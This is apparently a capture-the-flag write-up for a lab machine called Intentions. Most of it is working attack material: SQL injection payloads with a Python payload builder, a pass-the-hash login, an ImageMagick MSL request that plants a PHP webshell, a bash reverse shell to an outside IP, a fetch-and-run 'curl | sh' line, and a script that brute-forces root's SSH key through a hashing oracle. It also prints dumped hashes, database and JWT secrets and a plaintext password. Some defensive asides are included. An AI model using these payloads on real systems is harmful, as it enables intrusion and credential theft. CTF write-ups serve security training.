Intentions

Recon

nmap_scan.log
Open 10.129.229.27:22
Open 10.129.229.27:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.229.27

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCbEW8beTNeBRfWCUhSxjST5j/gsczjYvLp9vmAsclM2CG/L0KsthRQMThUc1L+eJC0mVYm46K2qkCVwni2zNHU=
|   256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEdBQnXdYum2v3ky5zsqh2jiTOu8kbWYpKiDFJmRJ97m
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Intentions
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Writeup.png

Backend seems to be PHP, probably Laravel.

Writeup-1.png

News is empty, Gallery/Your Feed shows just images, and Profile lets us update Favorite Genres.

Writeup-2.png

SQLi

SQLMap came back empty-handed 🤔

└─$ sqlmap -r genres.req --second-req feed.req --dbms=MySQL --threads=9 --batch --current-db --risk 3 --level 5 --technique=BEUS -p genres

The genres field doesn't allow any spaces, and we can reasonably deduce that a SQL function wraps the value rather than a plain IN list. sqlmap's failure is probably syntax-related, since its payloads rely on whitespace.

SELECT * FROM table WHERE column IN ('col1','col2')
SELECT * FROM table WHERE func(column, 'col1','col2')

FIND_IN_SET(str, strlist) looks like the target, because it takes the search list as a single comma-separated string.

POST /api/v1/gallery/user/genres
{"genres":"food')#"}

GET /api/v1/gallery/user/feed HTTP/1.1
...Return Food Category...

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md#extract-database-with-information_schema

The SELECT has 5 columns

{"genres":"food')ORDER/**/BY/**/5#"} // Success
{"genres":"food')ORDER/**/BY/**/6#"} // Fail

Get databases

{"genres":"x')UNION/**/SELECT/**/NULL,GROUP_CONCAT(schema_name),NULL,NULL,NULL/**/FROM/**/information_schema.schemata#"}
---
{"id":null,"file":"information_schema,intentions","genre":null,"created_at":null,"updated_at":null,"url":"\/storage\/information_schema,intentions"}

Get tables from current database

{"genres":"x') /**/UNION /**/SELECT /**/NULL,GROUP_CONCAT(table_name),NULL,NULL,NULL /**/FROM /**/information_schema.tables /**/WHERE /**/table_schema=database()#"}
---
{"id":null,"file":"gallery_images,personal_access_tokens,migrations,users","genre":null,"created_at":null,"updated_at":null,"url":"\/storage\/gallery_images,personal_access_tokens,migrations,users"}

Get columns from users

{"genres":"x')UNION/**/SELECT/**/NULL,GROUP_CONCAT(column_name),NULL,NULL,NULL/**/FROM/**/information_schema.columns/**/WHERE/**/table_name='users'#"}
---
{"id":null,"file":"id,name,email,password,created_at,updated_at,admin,genres","genre":null,"created_at":null,"updated_at":null,"url":"\/storage\/id,name,email,password,created_at,updated_at,admin,genres"}
{"genres":"x')UNION/**/SELECT/**/NULL,GROUP_CONCAT(CONCAT(name,':',password,':',email)),NULL,NULL,NULL/**/FROM/**/users#"}
---
steve:$2y$10$M\/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa:steve@intentions.htb
greg:$2y$10$95OR7nHSkYuFUUxsT1KS6uoQ93aufmrpknz4jwRqzIbsUpRiiyU5m:greg@intentions.htb
Melisa Runolfsson:$2y$10$bymjBxAEluQZEc1O7r1h3OdmlHJpTFJ6CqL1x2ZfQ3paSf509bUJ6:hettie.rutherford@example.org
Camren Ullrich:$2y$10$WkBf7NFjzE5GI5SP7hB5\/uA9Bi\/BmoNFIUfhBye4gUql\/JIc\/GTE2:nader.alva@example.org
Mr. Lucius Towne I:$2y$10$JembrsnTWIgDZH3vFo1qT.Zf\/hbphiPj1vGdVMXCk56icvD6mn\/ae:jones.laury@example.com
Jasen Mosciski:$2y$10$oKGH6f8KdEblk6hzkqa2meqyDeiy5gOSSfMeygzoFJ9d1eqgiD2rW:wanda93@example.org
Monique D'Amore:$2y$10$pAMvp3xPODhnm38lnbwPYuZN0B\/0nnHyTSMf1pbEoz6Ghjq.ecA7.:mwisoky@example.org
Desmond Greenfelder:$2y$10$.VfxnlYhad5YPvanmSt3L.5tGaTa4\/dXv1jnfBVCpaR2h.SDDioy2:lura.zieme@example.org
Mrs. Roxanne Raynor:$2y$10$UD1HYmPNuqsWXwhyXSW2d.CawOv1C8QZknUBRgg3\/Kx82hjqbJFMO:pouros.marcus@example.net
Rose Rutherford:$2y$10$4nxh9pJV0HmqEdq9sKRjKuHshmloVH1eH0mSBMzfzx\/kpO\/XcKw1m:mellie.okon@example.com
Dr. Chelsie Greenholt I:$2y$10$by.sn.tdh2V1swiDijAZpe1bUpfQr6ZjNUIkug8LSdR2ZVdS9bR7W:trace94@example.net
Prof. Johanna Ullrich MD:$2y$10$9Yf1zb0jwxqeSnzS9CymsevVGLWIDYI4fQRF5704bMN8Vd4vkvvHi:kayleigh18@example.com
Prof. Gina Brekke:$2y$10$UnvH8xiHiZa.wryeO1O5IuARzkwbFogWqE7x74O1we9HYspsv9b2.:tdach@example.com
Jarrett Bayer:$2y$10$yUpaabSbUpbfNIDzvXUrn.1O8I6LbxuK63GqzrWOyEt8DRd0ljyKS:lindsey.muller@example.org
Macy Walter:$2y$10$01SOJhuW9WzULsWQHspsde3vVKt6VwNADSWY45Ji33lKn7sSvIxIm:tschmidt@example.org
Prof. Devan Ortiz DDS:$2y$10$I7I4W5pfcLwu3O\/wJwAeJ.xqukO924Tx6WHz1am.PtEXFiFhZUd9S:murray.marilie@example.com
Eula Shields:$2y$10$0fkHzVJ7paAx0rYErFAtA.2MpKY\/ny1.kp\/qFzU22t0aBNJHEMkg2:barbara.goodwin@example.com
Mariano Corwin:$2y$10$p.QL52DVRRHvSM121QCIFOJnAHuVPG5gJDB\/N2\/lf76YTn1FQGiya:maggio.lonny@example.org
Madisyn Reinger DDS:$2y$10$GDyg.hs4VqBhGlCBFb5dDO6Y0bwb87CPmgFLubYEdHLDXZVyn3lUW:chackett@example.org
Jayson Strosin:$2y$10$Gy9v3MDkk5cWO40.H6sJ5uwYJCAlzxf\/OhpXbkklsHoLdA8aVt3Ei:layla.swift@example.net
Zelda Jenkins:$2y$10$\/2wLaoWygrWELes242Cq6Ol3UUx5MmZ31Eqq91Kgm2O8S.39cv9L2:rshanahan@example.net
Eugene Okuneva I:$2y$10$k\/yUU3iPYEvQRBetaF6GpuxAwapReAPUU8Kd1C0Iygu.JQ\/Cllvgy:shyatt@example.com
Mrs. Rhianna Hahn DDS:$2y$10$0aYgz4DMuXe1gm5\/aT.gTe0kgiEKO1xf\/7ank4EW1s6ISt1Khs8Ma:sierra.russel@example.com
Viola Vandervort DVM:$2y$10$iGDL\/XqpsqG.uu875Sp2XOaczC6A3GfO5eOz1kL1k5GMVZMipZPpa:ferry.erling@example.com
Prof. Margret Von Jr.:$2y$10$stXFuM4ct\/eKhUfu09JCVOXCTOQLhDQ4CFjlIstypyRUGazqmNpCa:beryl68@example.org
Florence Crona:$2y$10$NDW.r.M5zfl8yDT6rJTcjemJb0YzrJ6gl6tN.iohUugld3EZQZkQy:ellie.moore@example.net
Tod Casper:$2y$10$S5pjACbhVo9SGO4Be8hQY.Rn87sg10BTQErH3tChanxipQOe9l7Ou:littel.blair@example.org
let@me.in:$2y$10$Q38j4lnyMtfWfp4FZ4wEge0RScopxpl3V4a9TuSHEfQTY5B.Hi6tW:let@me.in

We have 2 potential users: steve and greg. The bcrypt hashes don't seem to be crackable :/
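The enumeration chain above, as an added helper that is not part of the original writeup: it builds the space-free FIND_IN_SET payloads (the field rejects spaces, so every space becomes an inline comment) and pulls the injected values out of the feed response. The column count (5), the slot that is reflected in "file" (column 2) and the "x')" terminator are taken from the requests above; SAMPLE_FEED is a constructed response in the same shape.

```python
import json
from typing import Optional

# Constructed sample of a /api/v1/gallery/user/feed response after a UNION payload.
# The shape mirrors the responses shown above; the injected value lands in "file".
SAMPLE_FEED = json.dumps([
    {"id": None, "file": "information_schema,intentions", "genre": None,
     "created_at": None, "updated_at": None,
     "url": "/storage/information_schema,intentions"},
])


def despace(sql: str) -> str:
    """The genres field rejects spaces, so every space becomes an inline comment."""
    return sql.replace(" ", "/**/")


def order_by_payload(n: int, terminator: str = "x") -> str:
    """Probe the column count: ORDER BY n succeeds while n <= number of columns."""
    return despace(f"{terminator}') ORDER BY {n}#")


def union_payload(expr: str, source: Optional[str] = None, columns: int = 5,
                  slot: int = 2, terminator: str = "x") -> str:
    """Close FIND_IN_SET('... and UNION our expression into column `slot` (1-based).

    `source` is the FROM clause (table plus optional WHERE/LIMIT); the trailing '#'
    comments out whatever the original query appends after our input.
    """
    cols = ["NULL"] * columns
    cols[slot - 1] = expr
    sql = f"{terminator}') UNION SELECT {','.join(cols)}"
    if source:
        sql += f" FROM {source}"
    return despace(sql + "#")


def genres_body(payload: str) -> str:
    """JSON body for POST /api/v1/gallery/user/genres."""
    return json.dumps({"genres": payload})


def extract(feed_json: str, column: str = "file") -> list:
    """Pull the injected value(s) out of the feed rows, splitting GROUP_CONCAT lists."""
    rows = json.loads(feed_json)
    return [v for r in rows for v in (r.get(column) or "").split(",") if v]


# The enumeration chain used above, as (label, request body) pairs ready to send.
STEPS = [
    ("databases", genres_body(union_payload(
        "GROUP_CONCAT(schema_name)", "information_schema.schemata"))),
    ("tables", genres_body(union_payload(
        "GROUP_CONCAT(table_name)", "information_schema.tables WHERE table_schema=database()"))),
    ("columns", genres_body(union_payload(
        "GROUP_CONCAT(column_name)", "information_schema.columns WHERE table_name='users'"))),
    ("creds", genres_body(union_payload(
        "GROUP_CONCAT(CONCAT(name,':',password,':',email))", "users"))),
]
```

One caveat worth remembering with this approach: MySQL truncates GROUP_CONCAT output at group_concat_max_len (1024 bytes by default), so a long users table can come back cut off. Passing a source such as "users LIMIT 1 OFFSET 3" pages through the rows one at a time instead.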

└─$ feroxbuster -u 'http://10.129.229.27/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "$(cat cookies)" -C 400,404 -k -I .css,.png
302      GET       12l       22w      326c http://10.129.229.27/admin => http://10.129.229.27
200      GET        2l     5429w   279176c http://10.129.229.27/js/login.js
200      GET       63l     3842w   411821c http://10.129.229.27/css/app.css
200      GET        2l     2249w   153684c http://10.129.229.27/js/mdb.js
200      GET       39l       94w     1523c http://10.129.229.27/
301      GET        7l       12w      178c http://10.129.229.27/css => http://10.129.229.27/css/
301      GET        7l       12w      178c http://10.129.229.27/fonts => http://10.129.229.27/fonts/
200      GET       39l       94w     1523c http://10.129.229.27/index.php
200      GET        0l        0w   310841c http://10.129.229.27/js/gallery.js
200      GET       21l       34w      566c http://10.129.229.27/gallery
301      GET        7l       12w      178c http://10.129.229.27/js => http://10.129.229.27/js/
302      GET       12l       22w      326c http://10.129.229.27/logout => http://10.129.229.27
200      GET        2l        3w       24c http://10.129.229.27/robots.txt
301      GET        7l       12w      178c http://10.129.229.27/storage => http://10.129.229.27/storage/
301      GET        7l       12w      178c http://10.129.229.27/storage/architecture => http://10.129.229.27/storage/architecture/
301      GET        7l       12w      178c http://10.129.229.27/storage/food => http://10.129.229.27/storage/food/

API

In the gallery, the Vue bundle has a few routes hard-coded in its compiled source. Feroxbuster didn't find any admin JavaScript, but that may just be a gap in the wordlist.

Writeup-3.png

/js/admin.js exists

Writeup-4.png

The browser's Sources tab pretty-prints the JS nicely; we can copy it out, save it and grep for common patterns.

└─$ grep api admin.js -in
2550:            ve.on(document, "click.bs.button.data-api", $e, (t=>{
2663:              , Ue = ".data-api"
2909:              , gn = `click${fn}.data-api`
3061:              , En = ".data-api"
3261:                static dataApiKeydownHandler(t) {
3281:            ve.on(document, Nn, Mn, Zn.dataApiKeydownHandler),
3282:            ve.on(document, Nn, Bn, Zn.dataApiKeydownHandler),
3500:              , kr = `click${dr}.data-api`
3699:              , Lr = ".data-api"
4405:              , wi = `load${_i}.data-api`
8478:                    Un.capitalize = Ws,
16842:                axios.get("/api/v2/admin/image/".concat(this.id)).then((function(e) {
16851:                    axios.post("/api/v2/admin/image/modify", {
16963:                axios.get("/api/v2/gallery/images").then((function(e) {
17015:                axios.get("/api/v2/admin/users").then((function(e) {
17086:            }, [t._v("v2 API Update")]), t._v(" "), e("p", {
17088:            }, [t._v("\n                Hey team, I've deployed the v2 API to production and have started using it in the admin section. \n                Let me know if you spot any bugs. \n                This will be a major security upgrade for our users, passwords no longer need to be transmitted to the server in clear text! \n                By hashing the password client side there is no risk to our users as BCrypt is basically uncrackable.\n                This should take care of the concerns raised by our users regarding our lack of HTTPS connection.\n            ")]), t._v(" "), e("p", {
17090:            }, [t._v("\n                The v2 API also comes with some neat features we are testing that could allow users to apply cool effects to the images. I've included some examples on the image editing page, but feel free to browse all of the available effects for the module and suggest some: "), e("a", {

A normal user login calls the v1 API; changing the same request to v2 returns an error saying a hash must be provided.

Writeup-5.png

If we try steve's bcrypt hash from the dump as the v2 password, we get a successful login.

Writeup-6.png
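Why this works, as an added example that is not the application's code: the changelog argues that hashing client-side is safe "because BCrypt is basically uncrackable", but once the server compares a client-supplied hash against the stored hash, the stored value is the credential and nobody needs to crack it. The snippet models both endpoints; PBKDF2 from the standard library stands in for bcrypt, and the user, salt and password are constructed.

```python
import hashlib
import hmac

# Constructed user record. The real app stores bcrypt ($2y$10$...); PBKDF2 stands in
# here so the example runs offline. Salt and password are made up.
SALT = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")


def kdf(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


USERS = {
    "steve@intentions.htb": {"salt": SALT, "hash": kdf("correct horse battery", SALT), "admin": True},
}


def login_v1(email: str, password: str):
    """v1: the client sends the password; the server re-derives and compares."""
    u = USERS.get(email)
    if u is None:
        return None
    return u if hmac.compare_digest(kdf(password, u["salt"]), u["hash"]) else None


def login_v2(email: str, presented_hash: str):
    """v2 as described in the changelog: the client sends the hash and the server compares
    it with the stored hash. Whatever is in the users table is now a reusable credential."""
    u = USERS.get(email)
    if u is None:
        return None
    try:
        presented = bytes.fromhex(presented_hash)
    except ValueError:
        return None
    return u if hmac.compare_digest(presented, u["hash"]) else None


def pass_the_hash_demo() -> dict:
    """Replay a value dumped from the users table (as the SQLi above did) against both endpoints."""
    leaked = USERS["steve@intentions.htb"]["hash"].hex()
    return {
        "v1_accepts_leaked_hash": login_v1("steve@intentions.htb", leaked) is not None,
        "v2_accepts_leaked_hash": login_v2("steve@intentions.htb", leaked) is not None,
    }
```

The concern the developer was trying to address (passwords crossing the wire in clear text over HTTP) is solved by TLS, not by client-side hashing. If a client-side hash is used at all, the server must still run its own hash over it before comparison, so that a dump of the users table on its own does not authenticate.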

Admin Panel

steve is admin so we can access /admin

Writeup-7.png

We can edit the images with different kinds of effects.

Writeup-8.png

For some reason SSRF works (???)

Writeup-9.png

ImageMagick

ImageMagick: The hidden vulnerability behind your online images > CVE-2022-44268: Arbitrary Remote Leak
CVE-2022-44268 PoC

└─$ git clone -q https://github.com/entr0pie/CVE-2022-44268.git
└─$ cd CVE-2022-44268
└─$ py CVE-2022-44268.py /etc/passwd

The CVE didn't work, but it led me to the correct version of ImageMagick used on the server.

└─$ identify -verbose ~/Downloads/download\ \(1\).jpeg | grep Version
  Version: ImageMagick 6.9.12-98 Q16 x86_64 18038 https://legacy.imagemagick.org

Going back to the odd URL quirk: PHP's ImageMagick binding fetches the image over http, see https://usage.imagemagick.org/files/#read

ImageMagick's read path supports several input schemes (coders), and http[s] is one of them.

Writeup-10.png

Surveillance had (somewhat) the same vulnerability, described in Exploiting Arbitrary Object Instantiations in PHP without Custom Classes:

“https://” goes to PHP, but “https:/” goes to curl

Using Abusing RCE #2: VID Scheme from that post, we can get a webshell on the server. The webroot path is disclosed by the web application when editing images, and we use it as the write target in the MSL payload. I used the PoC straight from the blog without much editing.

Writeup-11.png
POST /api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=wave HTTP/1.1
Host: 10.129.229.27
Content-Length: 309
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=ABC
Origin: http://10.129.229.27
Referer: http://10.129.229.27/admin
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTI5LjIyOS4yNy9hcGkvdjIvYXV0aC9sb2dpbiIsImlhdCI6MTczMzgxMzcyNCwiZXhwIjoxNzMzODM1MzI0LCJuYmYiOjE3MzM4MTM3MjQsImp0aSI6IjVBVHN6SmQyRHN6R3VWY1IiLCJzdWIiOiIxIiwicHJ2IjoiMjNiZDVjODk0OWY2MDBhZGIzOWU3MDFjNDAwODcyZGI3YTU5NzZmNyJ9.hApGrPnkH-tJXaU7Py6hjjQ6a3eItWT21QuYWRChaas
Connection: close

--ABC
Content-Disposition: form-data; name="swarm"; filename="swarm.msl"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="caption:&lt;?php @system(@$_REQUEST[0]); ?&gt;" /> 
 <write filename="info:/var/www/html/intentions/public/swarm.php" />
</image>
--ABC--

Note: in the blog's payload there is a leading space before <?xml, so mind that; Burp highlights the payload once it is well formed.

└─$ curl http://10.129.229.27/swarm.php?0=id
caption:uid=33(www-data) gid=33(www-data) groups=33(www-data)
 CAPTION 120x120 120x120+0+0 16-bit sRGB 1.910u 0:01.908

└─$ curl 'http://10.129.229.27/swarm.php' --data-urlencode '0=/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.113/4444 0>&1"'
---
(remote) www-data@intentions:/var/www/html/intentions/public$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
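The fix on the server side is ImageMagick's policy.xml (the /etc/ImageMagick-6/ directory is visible on this box): the MSL and VID coders used here, the http(s) and caption:/info: coders that made the earlier quirks possible, and indirect @file reads should all be denied for a web app that only transforms uploaded images. The following checker is an added example, not part of the writeup or of ImageMagick; it understands literal coder names, brace lists like {MSL,VID} and a bare '*' only, and does not reproduce ImageMagick's full glob/precedence matching (an assumption for this example). Both sample policies are constructed.

```python
import xml.etree.ElementTree as ET

# Coders reachable through a user-supplied filename that a web gallery has no reason to allow.
# The set follows the coders used in this writeup (MSL, VID, HTTP(S), CAPTION, INFO) plus the
# ones ImageMagick's own security-policy guidance disables; trim it to what the app needs.
DANGEROUS_CODERS = {"MSL", "VID", "URL", "HTTP", "HTTPS", "FTP", "TEXT", "LABEL", "CAPTION",
                    "INFO", "MVG", "EPHEMERAL", "PS", "PS2", "PS3", "EPS", "PDF", "XPS"}


def denied_coders(policy_xml: str) -> set:
    """Coders explicitly denied by <policy domain="coder" rights="none" pattern=.../> entries.

    Assumption: only literal names, brace lists ({MSL,VID}) and a bare '*' are handled;
    later re-grants after a '*' deny are not modelled.
    """
    denied = set()
    for p in ET.fromstring(policy_xml).iter("policy"):
        if p.get("domain") != "coder" or p.get("rights", "").strip().lower() != "none":
            continue
        pattern = p.get("pattern", "").strip()
        if pattern == "*":
            return set(DANGEROUS_CODERS)
        names = pattern.strip("{}").split(",")
        denied.update(n.strip().upper() for n in names if n.strip())
    return denied


def still_allowed(policy_xml: str) -> set:
    """Dangerous coders the given policy leaves enabled; empty means the checks pass."""
    return DANGEROUS_CODERS - denied_coders(policy_xml)


def indirect_reads_blocked(policy_xml: str) -> bool:
    """True when @file indirect reads (path domain, pattern @*) are denied."""
    return any(p.get("domain") == "path" and p.get("rights") == "none" and p.get("pattern") == "@*"
               for p in ET.fromstring(policy_xml).iter("policy"))


# Constructed policies: a loose one that only blocks the PostScript family, and a hardened one.
LOOSE_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PDF" />
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none"
          pattern="{EPHEMERAL,URL,HTTP,HTTPS,FTP,MVG,MSL,VID,TEXT,LABEL,CAPTION,INFO,PS,PS2,PS3,EPS,PDF,XPS}" />
  <policy domain="path" rights="none" pattern="@*" />
  <policy domain="delegate" rights="none" pattern="*" />
</policymap>"""
```

Run still_allowed() over the policy.xml actually installed on the host; anything it returns is a coder that a user-controlled path= parameter could still select. The MSL write to /var/www/html/intentions/public would also have been stopped by not running the converter as the same user that owns the webroot.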

Reverse Shell (www-data)

Get environment file for application

(remote) www-data@intentions:/var/www/html/intentions$ cat .env | grep -vE '^$|(=|null)$'
APP_NAME=Intentions
APP_ENV=production
APP_DEBUG=false
APP_URL=http://intentions.htb
LOG_CHANNEL=stack
LOG_LEVEL=debug
DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=intentions
DB_USERNAME=laravel
DB_PASSWORD=02mDWOgsOga03G385!!3Plcx
BROADCAST_DRIVER=log
CACHE_DRIVER=file
FILESYSTEM_DRIVER=local
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120
MEMCACHED_HOST=memcached
REDIS_HOST=redis
REDIS_PORT=6379
MAIL_MAILER=smtp
MAIL_HOST=mailhog
MAIL_PORT=1025
MAIL_FROM_NAME="${APP_NAME}"
AWS_DEFAULT_REGION=us-east-1
AWS_USE_PATH_STYLE_ENDPOINT=false
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
JWT_SECRET=yVH9RCGPMXyzNLoXrEsOl0klZi3MAxMHcMlRAnlobuSO8WNtLHStPiOUUgfmbwPt

Get users

(remote) www-data@intentions:/var/www/html/intentions$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
steven:x:1000:1000:steven:/home/steven:/bin/bash
greg:x:1001:1001::/home/greg:/bin/sh
legal:x:1002:1002:,,,:/home/legal:/bin/bash
(remote) www-data@intentions:/var/www/html/intentions/public$ curl 10.10.14.113/lp.sh|sh|tee /tmp/lp.log
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                        LEFT          LAST                        PASSED               UNIT                           ACTIVATES
Tue 2024-12-10 12:09:00 UTC 18min left    Tue 2024-12-10 11:39:06 UTC 11min ago            phpsessionclean.timer          phpsessionclean.service
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root    1136 Mar 23  2022 /etc/crontab
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml
(remote) www-data@intentions:/var/www/html/intentions$ git status
fatal: detected dubious ownership in repository at '/var/www/html/intentions'
To add an exception for this directory, call:

        git config --global --add safe.directory /var/www/html/intentions
(remote) www-data@intentions:/var/www/html/intentions$ cp .git /tmp/^C
(remote) www-data@intentions:/var/www/html/intentions$ mkdir /tmp/app
(remote) www-data@intentions:/var/www/html/intentions$ cp .git /tmp/app/.git -r
(remote) www-data@intentions:/var/www/html/intentions$ cd /tmp/app
(remote) www-data@intentions:/tmp/app$ git log --oneline
1f29dfd (HEAD -> master) Fix webpack for production
f7c903a Test cases did not work on steves local database, switching to user factory per his advice
36b4287 Adding test cases for the API!
d7ef022 Initial v2 commit
(remote) www-data@intentions:/tmp/app$ git log -p f7c903a
commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4
Author: greg <greg@intentions.htb>
Date:   Thu Jan 26 09:21:52 2023 +0100

    Test cases did not work on steves local database, switching to user factory per his advice

diff --git a/tests/Feature/Helper.php b/tests/Feature/Helper.php
index f57e37b..0586d51 100644
--- a/tests/Feature/Helper.php
+++ b/tests/Feature/Helper.php
@@ -8,12 +8,14 @@ class Helper extends TestCase
 {
     public static function getToken($test, $admin = false) {
         if($admin) {
-            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg@intentions.htb', 'password' => 'Gr3g1sTh3B3stDev3l0per!1998!']);
-            return $res->headers->get('Authorization');
+            $user = User::factory()->admin()->create();
         }
         else {
-            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg_user@intentions.htb', 'password' => 'Gr3g1sTh3B3stDev3l0per!1998!']);
-            return $res->headers->get('Authorization');
+            $user = User::factory()->create();
         }
+
+        $token = Auth::login($user);
+        $user->delete();
+        return $token;
     }
 }
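Review bot: deleting the `'password' => 'Gr3g1sTh3B3stDev3l0per!1998!'` logins for greg@intentions.htb and greg_user@intentions.htb from getToken() does not remove them from history, and the .git directory sits inside the deployed tree at /var/www/html/intentions, so this commit leaves the credential recoverable by anyone with read access there; the password needs rotating and the history rewriting (or the repository kept out of the deployment). Separately, `$token = Auth::login($user); $user->delete(); return $token;` returns a token for a user row that no longer exists, which only keeps working if token validation never re-checks the user; delete the factory user in test teardown instead, or document why a dangling token is acceptable here.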

SSH

└─$ sshpass -p 'Gr3g1sTh3B3stDev3l0per!1998!' ssh greg@intentions.htb
$ id
uid=1001(greg) gid=1001(greg) groups=1001(greg),1003(scanner)
$ bash
greg@intentions:~$ find / -group scanner -ls 2>/dev/null
   147633      4 drwxr-x---   2 root     scanner      4096 Jun 19  2023 /opt/scanner
   131176   1404 -rwxr-x---   1 root     scanner   1437696 Jun 19  2023 /opt/scanner/scanner

User.txt

greg@intentions:~$ cat user.txt
e7a7481c5cc99c8f2d1e1492cb3bac30

Privilege Escalation

greg@intentions:~$ cat dmca_check.sh
/opt/scanner/scanner -d /home/legal/uploads -h /home/greg/dmca_hashes.test
greg@intentions:~$ cat dmca_hashes.test
DMCA-#5133:218a61dfdebf15292a94c8efdd95ee3c
DMCA-#4034:a5eff6a2f4a3368707af82d3d8f665dc
...
greg@intentions:~$ /opt/scanner/scanner -d /home/legal/uploads -h /home/greg/dmca_hashes.test
[+] DMCA-#1952 matches /home/legal/uploads/zac-porter-p_yotEbRA0A-unsplash.jpg
greg@intentions:~$ /opt/scanner/scanner
The copyright_scanner application provides the capability to evaluate a single file or directory of files against a known blacklist and return matches.

  This utility has been developed to help identify copyrighted material that have previously been submitted on the platform.
  This tool can also be used to check for duplicate images to avoid having multiple of the same photos in the gallery.
  File matching are evaluated by comparing an MD5 hash of the file contents or a portion of the file contents against those submitted in the hash file.

  The hash blacklist file should be maintained as a single LABEL:MD5 per line.
  Please avoid using extra colons in the label as that is not currently supported.

  Expected output:
  1. Empty if no matches found
  2. A line for every match, example:
   [+] {LABEL} matches {FILE}

  -c string
     Path to image file to check. Cannot be combined with -d
  -d string
     Path to image directory to check. Cannot be combined with -c
  -h string
     Path to colon separated hash file. Not compatible with -p
  -l int
     Maximum bytes of files being checked to hash. Files smaller than this value will be fully hashed. Smaller values are much faster but prone to false positives. (default 500)
  -p [Debug] Print calculated file hash. Only compatible with -c
  -s string
     Specific hash to check against. Not compatible with -h

The scanner hashes only the first -l bytes of a file and tells us whether that digest equals the -s value, so it is a byte-at-a-time oracle: starting from a known prefix, we can recover root's SSH key by brute-forcing one character at a time. A quick sanity check against /etc/hostname (the host is called intentions) confirms the behaviour:

greg@intentions:~$ /opt/scanner/scanner -c /etc/hostname -l 1 -s $(echo -n 'i' | md5sum | awk '{print($1)}')
[+] 865c0c0b4ab0e063e5caa3387c1a8741 matches /etc/hostname
greg@intentions:~$ /opt/scanner/scanner -c /etc/hostname -l 2 -s $(echo -n 'in' | md5sum | awk '{print($1)}')
[+] 13b5bfe96f3e2fe411c9f66f4a582adf matches /etc/hostname
greg@intentions:~$ /opt/scanner/scanner -c /etc/hostname -l 3 -s $(echo -n 'int' | md5sum | awk '{print($1)}')
[+] fa7153f7ed1cb6c0fcf2ffb2fac21748 matches /etc/hostname
greg@intentions:~$ /opt/scanner/scanner -c /root/.ssh/id_rsa -l 5 -s $(echo -n '-----' | md5sum | awk '{print($1)}')
[+] 6891cd577154913289a606b5b24541f0 matches /root/.ssh/id_rsa

Automating the same check, one character at a time:

from hashlib import md5
from subprocess import check_output
from shlex import split
import string

FILENAME = '/root/.ssh/id_rsa'
COMMAND = '/opt/scanner/scanner -c {} -l {} -s {}'

# Known prefix of the file; the scanner hashes only the first -l bytes, so we can
# extend the prefix one byte at a time and let the tool confirm each guess.
contents = '-----BEGIN OPENSSH PRIVATE KEY-----\n'
while True:
    length = len(contents) + 1
    for c in string.printable:
        hash_ = md5((contents + c).encode()).hexdigest()
        output = check_output(split(COMMAND.format(FILENAME, length, hash_)), text=True)
        print(f'\r[{length}] [{c!r}] {hash_}', end='', flush=True)
        if hash_ in output:   # "[+] <hash> matches <file>" means the guess was right
            contents += c
            break
    else:                     # no printable byte matched: end of file reached
        print('\nProgram finished')
        break

with open('/tmp/output', 'w') as f:
    print(contents, file=f)
